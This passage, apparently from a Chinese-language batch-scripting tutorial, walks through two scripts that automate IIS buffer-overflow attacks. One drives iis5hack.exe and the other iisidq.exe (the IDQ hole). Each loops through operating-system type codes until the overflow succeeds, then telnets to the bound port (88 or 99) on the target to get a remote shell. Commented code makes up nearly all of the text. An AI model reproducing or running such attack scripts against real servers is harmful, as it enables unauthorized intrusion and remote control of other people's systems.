iis5hack %1 80 3 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 3 失败! :2
iis5hack %1 80 2 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 2 失败! :1
iis5hack %1 80 1 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 1 失败! :0
iis5hack %1 80 0 88 | find \if not errorlevel 1 goto telnet echo 操作系统类型 0 失败! goto error :telnet
telnet %1 88 /*开始连接目标ip的88端口 goto exit /*连接中断后跳转exit段 :error /*error段显示错误后的帮助信息
echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!
echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口] ECHO 中文: 0 ECHO 中文+sp1: 1 ECHO 英文: 2 ECHO 英文+sp1: 3 ECHO 日语: 4 ECHO 日语+sp1: 5 ECHO 韩文: 6 ECHO 韩文+sp1: 7 ECHO 墨西哥语: 8 ECHO 墨西哥语+sp1: 9 goto exit /*跳转exit段
:file /*file段显示文件没有发现的信息 echo 文件iis5hack.exe没有发现!程序终止运行! goto exit /*跳转exit段
:help /*help段显示本批处理的使用格式帮助 echo 本程序用法如下: echo iis [目标ip]
echo iis [目标ip] [开始的号码9-0] :exit /*exit段为程序出口
这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大!
例二
这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下:
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
其中,如果输入命令参数没有输入,那么,默认为:\。 其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下: @echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一 if %1 == \ /*同例一 ping %1 -n 1 | find \ /*同例一 if errorlevel 1 goto error1 /*同例一
set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip
set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。 :no /*no段开始
if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。
if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数
器来控制其
if %a%==2 set d=2 /*变动。 if %a%==3 set d=3 if %a%==4 set d=4 if %a%==5 set d=5 if %a%==6 set d=6 if %a%==7 set d=7 if %a%==9 set d=9 if %a%==10 set d=13 if %a%==11 set d=14
goto 0 /*变量传递完成后转到标志0处运行 :1
echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......
:0 /*标志0开始
IISIDQ %d% %b% 80 1 99 |find \按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good) if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳
/*转标志1处继续尝试发送
ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执
/*行结果
echo 正在执行第%d%项! /*报告正在溢出的操作系统类型 telnet %b% 99 /*连接溢出端口 echo. /*显示一个空行
if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处(循环出口)
if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值
if %d%==9 set a=10 if %d%==7 set a=9 if %d%==6 set a=7 if %d%==5 set a=6 if %d%==4 set a=5 if %d%==3 set a=4 if %d%==2 set a=3 if %d%==1 set a=2 if %d%==0 set a=1
goto no /*附值完成跳转no段执行 :file /*以下都是出错后的帮助提示 echo IIsidq.exe没有发现!将该文件和本文件放在同一目录! goto exit :error